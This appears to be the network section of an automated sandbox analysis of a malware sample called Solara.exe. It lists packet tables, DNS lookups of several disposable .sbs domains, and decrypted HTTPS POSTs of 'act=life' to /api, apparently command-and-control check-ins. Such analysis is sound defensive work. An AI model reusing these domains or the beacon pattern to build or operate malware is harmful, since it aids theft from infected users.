Oct 13, 2024 01:33:12.160670042 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.650450945 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.650757074 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.652456999 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.652481079 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.653327942 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.654603004 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.654649973 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.654800892 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.782269001 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.782406092 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.782484055 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.782522917 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.782996893 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.783057928 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.783071041 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.783289909 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.783355951 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.803469896 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.803469896 CEST	49739	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.803556919 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.803595066 CEST	443	49739	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.870899916 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.870969057 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:12.871049881 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.871515989 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:12.871531010 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.365946054 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.366053104 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.368338108 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.368386030 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.368809938 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.370619059 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.370826960 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.370840073 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.489396095 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.489533901 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.489600897 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.489634037 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.489680052 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.489758968 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.489768028 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.489784002 CEST	443	49740	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.489836931 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.489973068 CEST	49740	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.576184034 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.576277018 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:13.576380014 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.576736927 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:13.576761961 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.056561947 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.056803942 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.058315992 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.058331013 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.058826923 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.060652971 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.060779095 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.060786009 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.172306061 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.172435045 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.172512054 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.172547102 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.172589064 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.172657013 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.172667027 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.172759056 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.172770023 CEST	443	49741	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.172822952 CEST	49741	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.215652943 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.215760946 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.215864897 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.216187000 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.216204882 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.711033106 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.711323977 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.712656021 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.712671995 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.713562012 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.715260983 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.715306997 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.715543032 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.848778963 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.848911047 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.848990917 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.849103928 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.849138021 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.849188089 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.849406958 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.849590063 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.849648952 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.863974094 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.864001989 CEST	443	49742	104.21.53.8	192.168.2.4
Oct 13, 2024 01:33:14.864013910 CEST	49742	443	192.168.2.4	104.21.53.8
Oct 13, 2024 01:33:14.864020109 CEST	443	49742	104.21.53.8	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 01:33:02.789521933 CEST	54360	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:02.873225927 CEST	53	54360	1.1.1.1	192.168.2.4
Oct 13, 2024 01:33:02.874735117 CEST	53019	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:02.886395931 CEST	53	53019	1.1.1.1	192.168.2.4
Oct 13, 2024 01:33:03.992000103 CEST	50815	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:04.000555992 CEST	53	50815	1.1.1.1	192.168.2.4
Oct 13, 2024 01:33:04.003295898 CEST	62379	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:04.015908003 CEST	53	62379	1.1.1.1	192.168.2.4
Oct 13, 2024 01:33:04.960091114 CEST	51372	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:04.975016117 CEST	53	51372	1.1.1.1	192.168.2.4
Oct 13, 2024 01:33:05.997096062 CEST	63554	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:06.010117054 CEST	53	63554	1.1.1.1	192.168.2.4
Oct 13, 2024 01:33:06.978221893 CEST	59870	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:06.991633892 CEST	53	59870	1.1.1.1	192.168.2.4
Oct 13, 2024 01:33:07.876070976 CEST	53173	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:07.888909101 CEST	53	53173	1.1.1.1	192.168.2.4
Oct 13, 2024 01:33:08.828087091 CEST	49523	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:08.842350006 CEST	53	49523	1.1.1.1	192.168.2.4
Oct 13, 2024 01:33:09.812561989 CEST	49884	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:09.819088936 CEST	53	49884	1.1.1.1	192.168.2.4
Oct 13, 2024 01:33:11.204751968 CEST	59048	53	192.168.2.4	1.1.1.1
Oct 13, 2024 01:33:11.366800070 CEST	53	59048	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 01:33:02.789521933 CEST	192.168.2.4	1.1.1.1	0xb50d	Standard query (0)	explorationmsn.store	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:02.874735117 CEST	192.168.2.4	1.1.1.1	0x64d2	Standard query (0)	mathcucom.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:03.992000103 CEST	192.168.2.4	1.1.1.1	0xae09	Standard query (0)	allocatinow.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:04.003295898 CEST	192.168.2.4	1.1.1.1	0x9a25	Standard query (0)	enlargkiw.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:04.960091114 CEST	192.168.2.4	1.1.1.1	0x87db	Standard query (0)	resinedyw.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:05.997096062 CEST	192.168.2.4	1.1.1.1	0x42ee	Standard query (0)	vennurviot.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:06.978221893 CEST	192.168.2.4	1.1.1.1	0xd2c5	Standard query (0)	ehticsprocw.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:07.876070976 CEST	192.168.2.4	1.1.1.1	0xd936	Standard query (0)	condifendteu.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:08.828087091 CEST	192.168.2.4	1.1.1.1	0xdd8d	Standard query (0)	drawwyobstacw.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:09.812561989 CEST	192.168.2.4	1.1.1.1	0x87ac	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:11.204751968 CEST	192.168.2.4	1.1.1.1	0xd6da	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 01:33:02.873225927 CEST	1.1.1.1	192.168.2.4	0xb50d	Name error (3)	explorationmsn.store	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:02.886395931 CEST	1.1.1.1	192.168.2.4	0x64d2	No error (0)	mathcucom.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:02.886395931 CEST	1.1.1.1	192.168.2.4	0x64d2	No error (0)	mathcucom.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:04.000555992 CEST	1.1.1.1	192.168.2.4	0xae09	Name error (3)	allocatinow.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:04.015908003 CEST	1.1.1.1	192.168.2.4	0x9a25	No error (0)	enlargkiw.sbs		104.21.33.249	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:04.015908003 CEST	1.1.1.1	192.168.2.4	0x9a25	No error (0)	enlargkiw.sbs		172.67.152.13	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:04.975016117 CEST	1.1.1.1	192.168.2.4	0x87db	No error (0)	resinedyw.sbs		104.21.77.78	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:04.975016117 CEST	1.1.1.1	192.168.2.4	0x87db	No error (0)	resinedyw.sbs		172.67.205.156	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:06.010117054 CEST	1.1.1.1	192.168.2.4	0x42ee	No error (0)	vennurviot.sbs		172.67.140.193	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:06.010117054 CEST	1.1.1.1	192.168.2.4	0x42ee	No error (0)	vennurviot.sbs		104.21.46.170	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:06.991633892 CEST	1.1.1.1	192.168.2.4	0xd2c5	No error (0)	ehticsprocw.sbs		104.21.30.221	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:06.991633892 CEST	1.1.1.1	192.168.2.4	0xd2c5	No error (0)	ehticsprocw.sbs		172.67.173.224	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:07.888909101 CEST	1.1.1.1	192.168.2.4	0xd936	No error (0)	condifendteu.sbs		172.67.141.136	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:07.888909101 CEST	1.1.1.1	192.168.2.4	0xd936	No error (0)	condifendteu.sbs		104.21.79.35	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:08.842350006 CEST	1.1.1.1	192.168.2.4	0xdd8d	No error (0)	drawwyobstacw.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:08.842350006 CEST	1.1.1.1	192.168.2.4	0xdd8d	No error (0)	drawwyobstacw.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:09.819088936 CEST	1.1.1.1	192.168.2.4	0x87ac	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:11.366800070 CEST	1.1.1.1	192.168.2.4	0xd6da	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:11.366800070 CEST	1.1.1.1	192.168.2.4	0xd6da	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false
Oct 13, 2024 01:33:22.212944031 CEST	1.1.1.1	192.168.2.4	0xa0e7	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 13, 2024 01:33:22.212944031 CEST	1.1.1.1	192.168.2.4	0xa0e7	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mathcucom.sbs

enlargkiw.sbs

resinedyw.sbs

vennurviot.sbs

ehticsprocw.sbs

condifendteu.sbs

drawwyobstacw.sbs

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.97.3	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:03 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mathcucom.sbs
2024-10-12 23:33:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 23:33:03 UTC	813	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cpc15v66v2c2m1ev38pat047ca; expires=Wed, 05 Feb 2025 17:19:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cdy%2FmuTLGpBTeIM7U7UGaPabrHrU6fCX4KpsoYzElXZaWYZazJuI%2BQ9jsllsyYGed62mB4WKN9PRiABWHrOF6qBJ0tkf3guDTtScfYUBPNSQssSOdjkmNX7BvhWYDfoQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae4896be5728f-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 23:33:03 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 23:33:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.33.249	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:04 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: enlargkiw.sbs
2024-10-12 23:33:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 23:33:04 UTC	819	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eeeejdorqhrfgcsamsv7q1mpgu; expires=Wed, 05 Feb 2025 17:19:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2BFtEe6rOlJrsUOGTxE8PaexkQRTAOt50OZrYig8KZr15YT5EmcZ%2B6BOdCaP9nbfeKlIxYG32tx%2BXghqOlC%2BNGTKq13plFCNzRmCvIFA38X7A4z5tld9VrAOY%2BNycbbZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae48fcd2f32e2-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 23:33:04 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 23:33:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.77.78	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:05 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: resinedyw.sbs
2024-10-12 23:33:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 23:33:05 UTC	817	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tc4r18stqvnveknb99ksssjons; expires=Wed, 05 Feb 2025 17:19:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZwy8eo4rqQHf%2BVXUq8MhP%2BgYKgXLEe4WUYlzgPTJrOf7v8N%2BN7CYLpLdnvHCrlBoAjK88MWY3%2BJsoDxXnrJ1GcM61qSv8EbLMg4MPhkkC3jOh5TQs1r6IqXZxw1fBtW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae49588c44244-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 23:33:05 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 23:33:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	172.67.140.193	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:06 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vennurviot.sbs
2024-10-12 23:33:06 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 23:33:06 UTC	823	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1o6i7c9164eps92qn3f8pv95an; expires=Wed, 05 Feb 2025 17:19:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0v%2BxiWPDBePqTqGzMKgcw4jE%2F9g5t61lsY%2B8HUayINIS8lv8a1G4N60HyHD5egfVtD1xsih7UekG7xFUMJ605QfIOXpNSH0Gu2M4Q31OXFnubSc7plCwwCdGmhbyabF99Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae49c0db22361-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 23:33:06 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 23:33:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	104.21.30.221	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:07 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ehticsprocw.sbs
2024-10-12 23:33:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 23:33:07 UTC	821	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fitcdophlmf5j0qpig5729sua8; expires=Wed, 05 Feb 2025 17:19:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ytrTmMYBxFeHG3akeOvQScoryL4lXZfbLlaXFitobLEJZW16IkTg6E6LoWfOwczNwz9l3jYGwKdiGRk8QU9AgiIphwVcn67LZ9tAjy%2FvhpVpngQwuCi6MDPchyrrpV%2Fbr%2B4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae4a20cd50f74-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 23:33:07 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 23:33:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	172.67.141.136	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:08 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condifendteu.sbs
2024-10-12 23:33:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 23:33:08 UTC	821	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=88m5a92gtos2rs1uom9b630cbo; expires=Wed, 05 Feb 2025 17:19:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pXn1FqUDytw1V8a94irUw%2BffWvZ2eYJ8JWHWcWqDO2IuYZD%2BwJma4kiF7Cdpc68iiRecOA4ETVfxY20sup03yIU8gX4fjBrPeENNbLLZdLk%2BsrbbjQDjhbxdfg9OHs1C%2FMul"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae4a7e8eb42b2-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 23:33:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 23:33:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	188.114.96.3	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:09 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawwyobstacw.sbs
2024-10-12 23:33:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
